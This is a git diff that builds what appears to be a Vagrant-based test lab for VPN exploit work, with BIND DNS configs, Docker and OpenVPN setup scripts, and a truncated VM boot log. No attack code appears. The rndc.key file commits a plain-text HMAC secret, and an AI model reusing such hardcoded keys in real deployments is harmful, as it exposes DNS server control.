being set up for the first time can use the contents of this file +# as initializing keys; thereafter, the keys in the managed key database +# will be trusted and maintained automatically. +# +# These keys are current as of Mar 2019. If any key fails to initialize +# correctly, it may have expired. In that event you should replace this +# file with a current version. The latest version of bind.keys can always +# be obtained from ISC at https://www.isc.org/bind-keys. +# +# See https://data.iana.org/root-anchors/root-anchors.xml for current trust +# anchor information for the root zone. + +trust-anchors { + # This key (20326) was published in the root zone in 2017. + . initial-key 257 3 8 "AwEAAaz/tAm8yTn4Mfeh5eyI96WSVexTBAvkMgJzkKTOiW1vkIbzxeF3 + +/4RgWOq7HrxRixHlFlExOLAJr5emLvN7SWXgnLh4+B5xQlNVz8Og8kv + ArMtNROxVQuCaSnIDdD5LKyWbRd2n9WGe2R8PzgCmr3EgVLrjyBxWezF + 0jLHwVN8efS3rCj/EWgvIWgb9tarpVUDK/b58Da+sqqls3eNbuv7pr+e + oZG+SrDK6nWeL3c6H5Apxz7LjVc1uTIdsIXxuOLYA4/ilBmSVIzuDWfd + RUfhHdY6+cn8HFRm+2hM8AnXGXws9555KrUB5qihylGa8subX2Nn6UwN + R1AkUTV74bU="; +}; diff --git a/virtual-test-environment/edgers/setups/dns/bind_config/db.0 b/virtual-test-environment/edgers/setups/dns/bind_config/db.0 new file mode 100755 index 0000000..e3aabdb --- /dev/null +++ b/virtual-test-environment/edgers/setups/dns/bind_config/db.0 @@ -0,0 +1,12 @@ +; +; BIND reverse data file for broadcast zone +; +$TTL 604800 +@ IN SOA localhost. root.localhost. ( + 1 ; Serial + 604800 ; Refresh + 86400 ; Retry + 2419200 ; Expire + 604800 ) ; Negative Cache TTL +; +@ IN NS localhost. diff --git a/virtual-test-environment/edgers/setups/dns/bind_config/db.127 b/virtual-test-environment/edgers/setups/dns/bind_config/db.127 new file mode 100755 index 0000000..cd05bef --- /dev/null +++ b/virtual-test-environment/edgers/setups/dns/bind_config/db.127 @@ -0,0 +1,13 @@ +; +; BIND reverse data file for local loopback interface +; +$TTL 604800 +@ IN SOA localhost. root.localhost. ( + 1 ; Serial + 604800 ; Refresh + 86400 ; Retry + 2419200 ; Expire + 604800 ) ; Negative Cache TTL +; +@ IN NS localhost. +1.0.0 IN PTR localhost. diff --git a/virtual-test-environment/edgers/setups/dns/bind_config/db.255 b/virtual-test-environment/edgers/setups/dns/bind_config/db.255 new file mode 100755 index 0000000..e3aabdb --- /dev/null +++ b/virtual-test-environment/edgers/setups/dns/bind_config/db.255 @@ -0,0 +1,12 @@ +; +; BIND reverse data file for broadcast zone +; +$TTL 604800 +@ IN SOA localhost. root.localhost. ( + 1 ; Serial + 604800 ; Refresh + 86400 ; Retry + 2419200 ; Expire + 604800 ) ; Negative Cache TTL +; +@ IN NS localhost. diff --git a/virtual-test-environment/edgers/setups/dns/bind_config/db.empty b/virtual-test-environment/edgers/setups/dns/bind_config/db.empty new file mode 100755 index 0000000..8a12858 --- /dev/null +++ b/virtual-test-environment/edgers/setups/dns/bind_config/db.empty @@ -0,0 +1,14 @@ +; BIND reverse data file for empty rfc1918 zone +; +; DO NOT EDIT THIS FILE - it is used for multiple zones. +; Instead, copy it, edit named.conf, and use that copy. +; +$TTL 86400 +@ IN SOA localhost. root.localhost. ( + 1 ; Serial + 604800 ; Refresh + 86400 ; Retry + 2419200 ; Expire + 86400 ) ; Negative Cache TTL +; +@ IN NS localhost. diff --git a/virtual-test-environment/edgers/setups/dns/bind_config/db.local b/virtual-test-environment/edgers/setups/dns/bind_config/db.local new file mode 100755 index 0000000..2f272d4 --- /dev/null +++ b/virtual-test-environment/edgers/setups/dns/bind_config/db.local @@ -0,0 +1,14 @@ +; +; BIND data file for local loopback interface +; +$TTL 604800 +@ IN SOA localhost. root.localhost. ( + 2 ; Serial + 604800 ; Refresh + 86400 ; Retry + 2419200 ; Expire + 604800 ) ; Negative Cache TTL +; +@ IN NS localhost. +@ IN A 127.0.0.1 +@ IN AAAA ::1 diff --git a/virtual-test-environment/edgers/setups/dns/bind_config/named.conf b/virtual-test-environment/edgers/setups/dns/bind_config/named.conf new file mode 100755 index 0000000..880786a --- /dev/null +++ b/virtual-test-environment/edgers/setups/dns/bind_config/named.conf @@ -0,0 +1,11 @@ +// This is the primary configuration file for the BIND DNS server named. +// +// Please read /usr/share/doc/bind9/README.Debian.gz for information on the +// structure of BIND configuration files in Debian, *BEFORE* you customize +// this configuration file. +// +// If you are just adding zones, please do that in /etc/bind/named.conf.local + +include "/etc/bind/named.conf.options"; +include "/etc/bind/named.conf.local"; +include "/etc/bind/named.conf.default-zones"; diff --git a/virtual-test-environment/edgers/setups/dns/bind_config/named.conf.default-zones b/virtual-test-environment/edgers/setups/dns/bind_config/named.conf.default-zones new file mode 100755 index 0000000..1a85ad3 --- /dev/null +++ b/virtual-test-environment/edgers/setups/dns/bind_config/named.conf.default-zones @@ -0,0 +1,30 @@ +// prime the server with knowledge of the root servers +zone "." { + type hint; + file "/usr/share/dns/root.hints"; +}; + +// be authoritative for the localhost forward and reverse zones, and for +// broadcast zones as per RFC 1912 + +zone "localhost" { + type master; + file "/etc/bind/db.local"; +}; + +zone "127.in-addr.arpa" { + type master; + file "/etc/bind/db.127"; +}; + +zone "0.in-addr.arpa" { + type master; + file "/etc/bind/db.0"; +}; + +zone "255.in-addr.arpa" { + type master; + file "/etc/bind/db.255"; +}; + + diff --git a/virtual-test-environment/edgers/setups/dns/bind_config/named.conf.local b/virtual-test-environment/edgers/setups/dns/bind_config/named.conf.local new file mode 100755 index 0000000..7a57b10 --- /dev/null +++ b/virtual-test-environment/edgers/setups/dns/bind_config/named.conf.local @@ -0,0 +1,8 @@ +// +// Do any local configuration here +// + +// Consider adding the 1918 zones here, if they are not used in your +// organization +//include "/etc/bind/zones.rfc1918"; + diff --git a/virtual-test-environment/edgers/setups/dns/bind_config/named.conf.options b/virtual-test-environment/edgers/setups/dns/bind_config/named.conf.options new file mode 100644 index 0000000..ff88f53 --- /dev/null +++ b/virtual-test-environment/edgers/setups/dns/bind_config/named.conf.options @@ -0,0 +1,39 @@ +acl "trusted" { + localhost; + 192.168.1.2; + 192.168.2.2; + 192.168.3.2; +}; + +options { + directory "/var/cache/bind"; + + recursion yes; + listen-on { any; }; + allow-query { any; }; + allow-recursion { trusted; }; + allow-query-cache { trusted; }; + + // If there is a firewall between you and nameservers you want + // to talk to, you may need to fix the firewall to allow multiple + // ports to talk. See http://www.kb.cert.org/vuls/id/800113 + + // If your ISP provided one or more IP addresses for stable + // nameservers, you probably want to use them as forwarders. + // Uncomment the following block, and insert the addresses replacing + // the all-0's placeholder. + + // forwarders { + // 0.0.0.0; + // }; + + //======================================================================== + // If BIND logs error messages about the root key being expired, + // you will need to update your keys. See https://www.isc.org/bind-keys + //======================================================================== + dnssec-validation auto; + + listen-on-v6 { any; }; + + +}; diff --git a/virtual-test-environment/edgers/setups/dns/bind_config/rndc.key b/virtual-test-environment/edgers/setups/dns/bind_config/rndc.key new file mode 100755 index 0000000..edd4eee --- /dev/null +++ b/virtual-test-environment/edgers/setups/dns/bind_config/rndc.key @@ -0,0 +1,4 @@ +key "rndc-key" { + algorithm hmac-sha256; + secret "tREasaE2Jal1GfwfL5iii3a88eRGKWui41l5h3v89OM="; +}; diff --git a/virtual-test-environment/edgers/setups/dns/bind_config/zones.rfc1918 b/virtual-test-environment/edgers/setups/dns/bind_config/zones.rfc1918 new file mode 100755 index 0000000..03b5546 --- /dev/null +++ b/virtual-test-environment/edgers/setups/dns/bind_config/zones.rfc1918 @@ -0,0 +1,20 @@ +zone "10.in-addr.arpa" { type master; file "/etc/bind/db.empty"; }; + +zone "16.172.in-addr.arpa" { type master; file "/etc/bind/db.empty"; }; +zone "17.172.in-addr.arpa" { type master; file "/etc/bind/db.empty"; }; +zone "18.172.in-addr.arpa" { type master; file "/etc/bind/db.empty"; }; +zone "19.172.in-addr.arpa" { type master; file "/etc/bind/db.empty"; }; +zone "20.172.in-addr.arpa" { type master; file "/etc/bind/db.empty"; }; +zone "21.172.in-addr.arpa" { type master; file "/etc/bind/db.empty"; }; +zone "22.172.in-addr.arpa" { type master; file "/etc/bind/db.empty"; }; +zone "23.172.in-addr.arpa" { type master; file "/etc/bind/db.empty"; }; +zone "24.172.in-addr.arpa" { type master; file "/etc/bind/db.empty"; }; +zone "25.172.in-addr.arpa" { type master; file "/etc/bind/db.empty"; }; +zone "26.172.in-addr.arpa" { type master; file "/etc/bind/db.empty"; }; +zone "27.172.in-addr.arpa" { type master; file "/etc/bind/db.empty"; }; +zone "28.172.in-addr.arpa" { type master; file "/etc/bind/db.empty"; }; +zone "29.172.in-addr.arpa" { type master; file "/etc/bind/db.empty"; }; +zone "30.172.in-addr.arpa" { type master; file "/etc/bind/db.empty"; }; +zone "31.172.in-addr.arpa" { type master; file "/etc/bind/db.empty"; }; + +zone "168.192.in-addr.arpa" { type master; file "/etc/bind/db.empty"; }; diff --git a/virtual-test-environment/edgers/setups/dns/install_docker.sh b/virtual-test-environment/edgers/setups/dns/install_docker.sh new file mode 100755 index 0000000..d40ade9 --- /dev/null +++ b/virtual-test-environment/edgers/setups/dns/install_docker.sh @@ -0,0 +1,19 @@ +#!/bin/bash +# + +echo "Installing docker.." + +curl -fsSL https://download.docker.com/linux/ubuntu/gpg | sudo apt-key add - + +sudo add-apt-repository "deb [arch=amd64] https://download.docker.com/linux/ubuntu $(lsb_release -cs) stable" + +sudo apt-get update + +apt-cache policy docker-ce + +sudo apt-get install -y docker-ce + + +sudo usermod -aG docker ${USER} + +sudo systemctl status docker diff --git a/virtual-test-environment/edgers/setups/dns/start_dns.sh b/virtual-test-environment/edgers/setups/dns/start_dns.sh new file mode 100755 index 0000000..53083df --- /dev/null +++ b/virtual-test-environment/edgers/setups/dns/start_dns.sh @@ -0,0 +1,13 @@ +#!/bin/bash +# + +echo "Starting dns server container.." + +docker run --name bind -d -it --restart=always \ + --publish=192.168.3.2:53:53/tcp --publish=192.168.3.2:53:53/udp --publish 10000:10000/tcp \ + -v /home/vagrant/bind_config/:/data/bind/etc/ \ + sameersbn/bind:9.16.1-20200524 + +#-v /home/vagrant/copy_config/:/data/bind/etc/ \ +#--volume /srv/docker/bind:/data \ +#--volume /home/vagrant/named.conf.options:/data/bind/etc/named.conf.options \ diff --git a/virtual-test-environment/edgers/setups/vpn_server/make_client_configs.sh b/virtual-test-environment/edgers/setups/vpn_server/make_client_configs.sh new file mode 100755 index 0000000..f9ca344 --- /dev/null +++ b/virtual-test-environment/edgers/setups/vpn_server/make_client_configs.sh @@ -0,0 +1,59 @@ +#!/bin/bash +# + +BORDER=">>>>>>>>>>>>>>>>" + +printf "$BORDER Setting up base client config file\n\n" + +mkdir -p ~/client-configs/files +chmod 700 ~/client-configs/files + + +cp /usr/share/doc/openvpn/examples/sample-config-files/client.conf ~/client-configs/base.conf + + +sed -i "s/my-server-1 1194/192.168.2.2 443/g" ~/client-configs/base.conf +sed -i "s/proto udp/proto tcp/g" ~/client-configs/base.conf + +sed -i "s/;user nobody/user nobody/g" ~/client-configs/base.conf +sed -i "s/;group nobody/group nobody/g" ~/client-configs/base.conf + +sed -i "s/ca ca.crt/# ca ca.crt/g" ~/client-configs/base.conf +sed -i "s/cert client.crt/# cert client.crt/g" ~/client-configs/base.conf +sed -i "s/key client.key/# key client.key/g" ~/client-configs/base.conf + + +cat >> ~/client-configs/base.conf << EOF +cipher AES-128-CBC +auth SHA256 +key-direction 1 +# script-security 2 +# up /etc/openvpn/update-resolv-conf +# down /etc/openvpn/update-resolv-conf +EOF + + +printf "$BORDER Creating make client config script..\n\n" + +touch ~/client-configs/make_config.sh + +cat >> ~/client-configs/make_config.sh << EOF +#!/bin/bash + +# First argument: Client identifier + +KEY_DIR=~/openvpn-ca/keys +OUTPUT_DIR=~/client-configs/files +BASE_CONFIG=~/client-configs/base.conf + +cat \${BASE_CONFIG} <(echo -e '') \${KEY_DIR}/ca.crt <(echo -e '\n') \${KEY_DIR}/\${1}.crt <(echo -e '\n') \${KEY_DIR}/\${1}.key <(echo -e '\n') \${KEY_DIR}/ta.key <(echo -e '') > \${OUTPUT_DIR}/\${1}.ovpn +EOF + +chmod 700 ~/client-configs/make_config.sh + + +printf "$BORDER Making client config file for client1\n\n" + +cd ~/client-configs +./make_config.sh client1 +ls ~/client-configs/files diff --git a/virtual-test-environment/edgers/setups/vpn_server/setup_vpn.sh b/virtual-test-environment/edgers/setups/vpn_server/setup_vpn.sh new file mode 100755 index 0000000..082c28b --- /dev/null +++ b/virtual-test-environment/edgers/setups/vpn_server/setup_vpn.sh @@ -0,0 +1,106 @@ +#!/bin/bash +# + +BORDER=">>>>>>>>>>>>>>" +printf "$BORDER Installing openvpn and EasyRSA $BORDER \n\n" + +sudo apt-get update -y +sudo apt-get install openvpn easy-rsa -y + + +printf "$BORDER Setting default openvpn vars $BORDER \n\n" + +make-cadir ~/openvpn-ca +cd ~/openvpn-ca + + +sed -i "s/KEY_PROVINCE=\"CA\"/KEY_PROVINCE=\"NM\"/g" vars +sed -i "s/KEY_CITY=\"SanFrancisco\"/KEY_CITY=\"Albuquerque\"/g" vars +sed -i "s/KEY_ORG=\"Fort-Funston\"/KEY_ORG=\"BreakpointingBad\"/g" vars +sed -i "s/KEY_NAME=\"EasyRSA\"/KEY_NAME=\"server\"/g" vars + + + +cd ~/openvpn-ca +source vars + + +printf "$BORDER Building the certificate authority $BORDER \n\n" + +./clean-all +./build-ca + +printf "$BORDER Creating the server certificate $BORDER \n\n" + +./build-key-server server + +printf "$BORDER Generating Diffie-Hellman keys to use during key exchange $BORDER \n\n" + +./build-dh + +printf "$BORDER Generating HMAC signature to strengthen the server’s TLS integrity verification" + +openvpn --genkey --secret keys/ta.key + + +printf "$BORDER Generating client certificate and key pair $BORDER \n\n" +cd ~/openvpn-ca +source vars +./build-key client1 + + +printf "$BORDER Configuring the openvpn service using generated keys + certs $BORDER \n\n" + +cd ~/openvpn-ca/keys +sudo cp ca.crt server.crt server.key ta.key dh2048.pem /etc/openvpn + +gunzip -c /usr/share/doc/openvpn/examples/sample-config-files/server.conf.gz | sudo tee /etc/openvpn/server.conf + + +sudo sed -i "s/;tls-auth ta.key 0/tls-auth ta.key 0/g" /etc/openvpn/server.conf +sudo sed -i "s/;cipher AES-128-CBC/cipher AES-128-CBC/g" /etc/openvpn/server.conf + +sudo sed -i "s/;user nobody/user nobody/g" /etc/openvpn/server.conf +sudo sed -i "s/;group nogroup/group nogroup/g" /etc/openvpn/server.conf + +#sudo sed -i "s/;push \"redirect-gateway def1 bypass-dhcp\"/push \"redirect-gateway def1 bypass-dhcp\"/g" /etc/openvpn/server.conf +#sudo sed -i "s/;push \"dhcp-option DNS 208.67.222.222\"/push \"dhcp-option DNS 208.67.222.222\"/g" /etc/openvpn/server.conf +#sudo sed -i "s/;push \"dhcp-option DNS 208.67.220.220\"/push \"dhcp-option DNS 208.67.220.220\"/g" /etc/openvpn/server.conf + +sudo bash -c 'cat >> /etc/openvpn/server.conf << EOF +auth SHA256 +EOF' + +sudo sed -i "s/port 1194/port 443/g" /etc/openvpn/server.conf +sudo sed -i "s/proto udp/proto tcp/g" /etc/openvpn/server.conf + + +printf "$BORDER Adjusting the servers network config to allow for vpn things $BORDER \n\n" + +sudo sed -i "s/#net.ipv4.ip_forward=1/net.ipv4.ip_forward=1/g" /etc/sysctl.conf +sudo sysctl -p + + +sudo bash -c 'cat >> /etc/ufw/before.rules << EOF +# START OPENVPN RULES +# NAT table rules +*nat +:POSTROUTING ACCEPT [0:0] +# Allow traffic from OpenVPN client to enp0s8 +-A POSTROUTING -s 10.8.0.0/8 -o enp0s8 -j MASQUERADE +COMMIT +# END OPENVPN RULES +EOF' + + +sudo sed -i "s/DEFAULT_FORWARD_POLICY=\"DROP\"/DEFAULT_FORWARD_POLICY=\"ACCEPT\"/g" /etc/default/ufw +sudo ufw allow 443/tcp +sudo ufw allow OpenSSH + +sudo ufw disable +sudo ufw enable + +printf "$BORDER Enabling the openvpn service $BORDER \n\n" + +sudo systemctl start openvpn@server +sudo systemctl enable openvpn@server diff --git a/virtual-test-environment/edgers/vpn-server/.vagrant/machines/default/virtualbox/vagrant_cwd b/virtual-test-environment/edgers/vpn-server/.vagrant/machines/default/virtualbox/vagrant_cwd new file mode 100644 index 0000000..0c4ee00 --- /dev/null +++ b/virtual-test-environment/edgers/vpn-server/.vagrant/machines/default/virtualbox/vagrant_cwd @@ -0,0 +1 @@ +/home/jive/space/gittin/VeepExploit/virt-lab/edgers/vpn-server \ No newline at end of file diff --git a/virtual-test-environment/edgers/vpn-server/Vagrantfile b/virtual-test-environment/edgers/vpn-server/Vagrantfile new file mode 100644 index 0000000..2fb2bd7 --- /dev/null +++ b/virtual-test-environment/edgers/vpn-server/Vagrantfile @@ -0,0 +1,20 @@ +# -*- mode: ruby -*- + +# vi: set ft=ruby : + +Vagrant.configure(2) do |config| + config.vm.box = "ubuntu/xenial64" + config.vm.hostname = "vague-vpn-server" + + config.vm.network "forwarded_port", guest: 22, host: 22112, id: 'ssh' + config.ssh.insert_key = true + + config.vm.network "private_network", ip: "192.168.2.2", virtualbox__intnet: "intnet-2" + + config.vm.provider "virtualbox" do |vb| + vb.name = "vague-vpn-server" + end + + config.vm.provision :shell, path: "setup_net.sh" + +end diff --git a/virtual-test-environment/edgers/vpn-server/copy_vpn_setup.sh b/virtual-test-environment/edgers/vpn-server/copy_vpn_setup.sh new file mode 100755 index 0000000..3c11250 --- /dev/null +++ b/virtual-test-environment/edgers/vpn-server/copy_vpn_setup.sh @@ -0,0 +1,13 @@ +#!/bin/bash +# + + +echo Copying vpn setup scripts to vpn VM.. + + +cd ../vpn-server + +scp -i .vagrant/machines/default/virtualbox/private_key -P 22112 ../setups/vpn_server/* vagrant@localhost:~ + + + diff --git a/virtual-test-environment/edgers/vpn-server/setup_net.sh b/virtual-test-environment/edgers/vpn-server/setup_net.sh new file mode 100755 index 0000000..abe5cdd --- /dev/null +++ b/virtual-test-environment/edgers/vpn-server/setup_net.sh @@ -0,0 +1,14 @@ +#!/bin/bash +# + + +OLD_NAME=vague-client +HNAME=vpnserver + +sed -i "s/$OLD_NAME/$HNAME/g" /etc/hostname +sed -i "s/$OLD_NAME/$HNAME/g" /etc/hosts +hostname $HNAME + +sed -i "s/#VAGRANT-END/up route add -net 192.168.0.0\/16 gw 192.168.2.254 dev enp0s8/g" /etc/network/interfaces +#/etc/init.d/networking restart +exit diff --git a/virtual-test-environment/edgers/vpn-server/ubuntu-xenial-16.04-cloudimg-console.log b/virtual-test-environment/edgers/vpn-server/ubuntu-xenial-16.04-cloudimg-console.log new file mode 100644 index 0000000..b434de9 --- /dev/null +++ b/virtual-test-environment/edgers/vpn-server/ubuntu-xenial-16.04-cloudimg-console.log @@ -0,0 +1,653 @@ +[ 0.000000] Initializing cgroup subsys cpuset +[ 0.000000] Initializing cgroup subsys cpu +[ 0.000000] Initializing cgroup subsys cpuacct +[ 0.000000] Linux version 4.4.0-190-generic (buildd@lcy01-amd64-026) (gcc version 5.4.0 20160609 (Ubuntu 5.4.0-6ubuntu1~16.04.12) ) #220-Ubuntu SMP Fri Aug 28 23:02:15 UTC 2020 (Ubuntu 4.4.0-190.220-generic 4.4.233) +[ 0.000000] Command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 +[ 0.000000] KERNEL supported cpus: +[ 0.000000] Intel GenuineIntel +[ 0.000000] AMD AuthenticAMD +[ 0.000000] Centaur CentaurHauls +[ 0.000000] x86/fpu: xstate_offset[2]: 576, xstate_sizes[2]: 256 +[ 0.000000] x86/fpu: Supporting XSAVE feature 0x01: 'x87 floating point registers' +[ 0.000000] x86/fpu: Supporting XSAVE feature 0x02: 'SSE registers' +[ 0.000000] x86/fpu: Supporting XSAVE feature 0x04: 'AVX registers' +[ 0.000000] x86/fpu: Enabled xstate features 0x7, context size is 832 bytes, using 'standard' format. +[ 0.000000] e820: BIOS-provided physical RAM map: +[ 0.000000] BIOS-e820: [mem 0x0000000000000000-0x000000000009fbff] usable +[ 0.000000] BIOS-e820: [mem 0x000000000009fc00-0x000000000009ffff] reserved +[ 0.000000] BIOS-e820: [mem 0x00000000000f0000-0x00000000000fffff] reserved +[ 0.000000] BIOS-e820: [mem 0x0000000000100000-0x000000003ffeffff] usable +[ 0.000000] BIOS-e820: [mem 0x000000003fff0000-0x000000003fffffff] ACPI data +[ 0.000000] BIOS-e820: [mem 0x00000000fec00000-0x00000000fec00fff] reserved +[ 0.000000] BIOS-e820: [mem 0x00000000fee00000-0x00000000fee00fff] reserved +[ 0.000000] BIOS-e820: [mem 0x00000000fffc0000-0x00000000ffffffff] reserved +[ 0.000000] NX (Execute Disable) protection: active +[ 0.000000] SMBIOS 2.5 present. +[ 0.000000] Hypervisor detected: KVM +[ 0.000000] e820: last_pfn = 0x3fff0 max_arch_pfn = 0x400000000 +[ 0.000000] MTRR: Disabled +[ 0.000000] x86/PAT: MTRRs disabled, skipping PAT initialization too. +[ 0.000000] CPU MTRRs all blank - virtualized system. +[ 0.000000] x86/PAT: Configuration [0-7]: WB WT UC- UC WB WT UC- UC +[ 0.000000] found SMP MP-table at [mem 0x0009fff0-0x0009ffff] mapped at [ffff88000009fff0] +[ 0.000000] Scanning 1 areas for low memory corruption +[ 0.000000] RAMDISK: [mem 0x362e0000-0x37167fff] +[ 0.000000] ACPI: Early table checksum verification disabled +[ 0.000000] ACPI: RSDP 0x00000000000E0000 000024 (v02 VBOX ) +[ 0.000000] ACPI: XSDT 0x000000003FFF0030 00003C (v01 VBOX VBOXXSDT 00000001 ASL 00000061) +[ 0.000000] ACPI: FACP 0x000000003FFF00F0 0000F4 (v04 VBOX VBOXFACP 00000001 ASL 00000061) +[ 0.000000] ACPI: DSDT 0x000000003FFF0470 0021FF (v02 VBOX VBOXBIOS 00000002 INTL 20180105) +[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 +[ 0.000000] ACPI: FACS 0x000000003FFF0200 000040 +[ 0.000000] ACPI: APIC 0x000000003FFF0240 00005C (v02 VBOX VBOXAPIC 00000001 ASL 00000061) +[ 0.000000] ACPI: SSDT 0x000000003FFF02A0 0001CC (v01 VBOX VBOXCPUT 00000002 INTL 20180105) +[ 0.000000] No NUMA configuration found +[ 0.000000] Faking a node at [mem 0x0000000000000000-0x000000003ffeffff] +[ 0.000000] NODE_DATA(0) allocated [mem 0x3ffeb000-0x3ffeffff] +[ 0.000000] kvm-clock: Using msrs 4b564d01 and 4b564d00 +[ 0.000000] kvm-clock: cpu 0, msr 0:3ffe3001, primary cpu clock +[ 0.000000] kvm-clock: using sched offset of 4314789818 cycles +[ 0.000000] clocksource: kvm-clock: mask: 0xffffffffffffffff max_cycles: 0x1cd42e4dffb, max_idle_ns: 881590591483 ns +[ 0.000000] Zone ranges: +[ 0.000000] DMA [mem 0x0000000000001000-0x0000000000ffffff] +[ 0.000000] DMA32 [mem 0x0000000001000000-0x000000003ffeffff] +[ 0.000000] Normal empty +[ 0.000000] Device empty +[ 0.000000] Movable zone start for each node +[ 0.000000] Early memory node ranges +[ 0.000000] node 0: [mem 0x0000000000001000-0x000000000009efff] +[ 0.000000] node 0: [mem 0x0000000000100000-0x000000003ffeffff] +[ 0.000000] Initmem setup node 0 [mem 0x0000000000001000-0x000000003ffeffff] +[ 0.000000] ACPI: PM-Timer IO Port: 0x4008 +[ 0.000000] IOAPIC[0]: apic_id 2, version 3, address 0xfec00000, GSI 0-23 +[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 0 global_irq 2 dfl dfl) +[ 0.000000] ACPI: INT_SRC_OVR (bus 0 bus_irq 9 global_irq 9 low level) +[ 0.000000] Using ACPI (MADT) for SMP configuration information +[ 0.000000] smpboot: Allowing 2 CPUs, 0 hotplug CPUs +[ 0.000000] PM: Registered nosae mmory: [mem 0x00000000-0x00000fff] +[ 0.000000] PM: Registered nosave memory: [mem 0x0009f000-0x0009ffff] +[ 0.000000] PM: Registered nosave memory: [mem 0x000a0000-0x000effff] +[ 0.000000] PM: Registered nosave memory: [mem 0x000f0000-0x000fffff] +[ 0.000000] e820: [mem 0x40000000-0xfebfffff] available for PCI devices +[ 0.000000] Booting paravirtualized kernel on KVM +[ 0.000000] clocksource: refined-jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645519600211568 ns +[ 0.000000] setup_percpu: NR_CPUS:512 nr_cpumask_bits:512 nr_cpu_ids:2 nr_node_ids:1 +[ 0.000000] PERCPU: Embedded 33 pages/cpu @ffff88003fc00000 s95512 r8192 d31464 u1048576 +[ 0.000000] Built 1 zonelists in Node order, mobility grouping on. Total pages: 257912 +[ 0.000000] Policy zone: DMA32 +[ 0.000000] Kernel command line: BOOT_IMAGE=/boot/vmlinuz-4.4.0-190-generic root=LABEL=cloudimg-rootfs ro console=tty1 console=ttyS0 +[ 0.000000] PID hash table entries: 4096 (order: 3, 32768 bytes) +[ 0.000000] Memory: 997664K/1048120K available (8636K kernel code, 1337K rwdata, 4040K rodata, 1492K init, 1296K bss, 50456K reserved, 0K cma-reserved) +[ 0.000000] SLUB: HWalign=64, Order=0-3, MinObjects=0, CPUs=2, Nodes=1 +[ 0.000000] Kernel/User page tables isolation: enabled +[ 0.000000] Hierarchical RCU implementatin. +[ 0.000000] Build-time adjustment of leaf fanout to 64. +[ 0.000000] RCU restricting CPUs from NR_CPUS=512 to nr_cpu_ids=2. +[ 0.000000] RCU: Adjusting geometry for rcu_fanout_leaf=64, nr_cpu_ids=2 +[ 0.000000] NR_IRQS:33024 nr_irqs:440 16 +[ 0.000000] Console: colour VGA+ 80x25 +[ 0.000000] console [tty1] enabled +[ 0.000000] console [ttyS0] enabled +[ 0.000000] tsc: Detected 2207.998 MHz processor +[ 0.986054] Calibrating delay loop (skipped) preset value.. 4415.99 BogoMIPS (lpj=8831992) +[ 1.025965] pid_max: default: 32768 minimum: 301 +[ 1.027009] ACPI: Core revision 20150930 +[ 1.042513] ACPI: 2 ACPI AML tables successfully acquired and loaded +[ 1.044067] Security Framework initialized +[ 1.045085] Yama: becoming mindful. +[ 1.045982] AppArmor: AppArmor initialized +[ 1.047079] Dentry cache hash table entries: 131072 (order: 8, 1048576 bytes) +[ 1.093990] Inode-cache hash table entries: 65536 (order: 7, 524288 bytes) +[ 1.095587] Mount-cache hash table entries: 2048 (order: 2, 16384 bytes) +[ 1.113859] Mountpoint-cache hash table entries: 2048 (order: 2, 16384 bytes) +[ 1.115552] Initializing cgroup subsys io +[ 1.128391] Initializing cgroup subsys memory +[ 1.138494] Initializing cgroup subsys devices +[ 1.173312] Initializing cgroup subsys freezer +[ 1.174456] Initializing cgroup subsys net_cls +[ 1.175553] Initializing cgroup subsys perf_event +[ 1.176719] Initializing cgroup subsys net_prio +[ 1.183021] Initializing cgroup subsys hugetlb +[ 1.204792] Initializing cgroup subsys pids +[ 1.226730] mce: CPU supports 0 MCE banks +[ 1.238743] Last level iTLB entries: 4KB 64, 2MB 8, 4MB 8 +[ 1.253921] Last level dTLB entries: 4KB 64, 2MB 0, 4MB 0, 1GB 4 +[ 1.255194] Spectre V1 : Mitigation: usercopy/swapgs barriers and __user pointer sanitization +[ 1.258138] Spectre V2 : Mitigation: Full generic retpoline +[ 1.268550] Spectre V2 : Spectre v2 / SpectreRSB mitigation: Filling RSB on context switch +[ 1.297390] Speculative Store Bypass: Vulnerable +[ 1.298981] SRBDS: Unknown: Dependent on hypervisor status +[ 1.300585] MDS: Mitigation: Clear CPU buffers +[ 1.307062] Freeing SMP alternatives memory: 36K +[ 1.315697] ftrace: allocating 32339 entries in 127 pages +[ 1.430735] smpboot: APIC(0) Converting physical 0 to logical package 0 +[ 1.443667] smpboot: Max logical packages: 1 +[ 1.457672] x2apic enabled +[ 1.458916] Switched APIC routing to physical x2apic. +[ 1.461522] ..TIMER: vector=0x30 apic1=0 pin1=2 apic2=-1 pin2=-1 +[ 1.571387] smpboot: CPU0: Intel(R) Core(TM) i3-8130U CPU @ 2.20GHz (family: 0x6, model: 0x8e, stepping: 0xa) +[ 1.583194] Performance Events: unsupported p6 CPU model 142 no PMU driver, software events only. +[ 1.628853] KVM setup paravirtual spinlock +[ 1.631600] x86: Booting SMP configuration: +[ 1.647273] .... node #0, CPUs: #1 +[ 1.649451] kvm-clock: cpu 1, msr 0:3ffe3041, secondary cpu clock +[ 1.701518] mce: CPU supports 0 MCE banks +[ 1.713936] x86: Booted up 1 node, 2 CPUs +[ 1.734019] smpboot: Total of 2 processors activated (8831.99 BogoMIPS) +[ 1.753343] devtmpfs: initialized +[ 1.775394] evm: security.selinux +[ 1.796166] evm: security.SMACK64 +[ 1.801879] evm: security.SMACK64EXEC +[ 1.813570] evm: security.SMACK64TRANSMUTE +[ 1.858928] evm: security.SMACK64MMAP +[ 1.864976] evm: security.ima +[ 1.865928] evm: security.capability +[ 1.880879] clocksource: jiffies: mask: 0xffffffff max_cycles: 0xffffffff, max_idle_ns: 7645041785100000 ns +[ 1.903667] futex hash table entries: 512 (order: 3, 32768 bytes) +[ 1.906903] pinctrl core: initialized pinctrl subsystem +[ 1.943003] RTC time: 22:38:15, date: 01/25/21 +[ 1.945340] NET: Registered protocol family 16 +[ 1.970659] cpuidle: using governor ladder +[ 1.990066] cpuidle: using governor menu +[ 1.992022] PCCT header not found. +[ 1.992916] ACPI: bus type PCI registered +[ 2.025108] acpiphp: ACPI Hot Plug PCI Controller Driver version: 0.5 +[ 2.044490] PCI: Using configuration type 1 for base access +[ 2.069257] ACPI: Added _OSI(Module Device) +[ 2.076967] ACPI: Added _OSI(Processor Device) +[ 2.084793] ACPI: Added _OSI(3.0 _SCP Extensions) +[ 2.085784] ACPI: Added _OSI(Processor 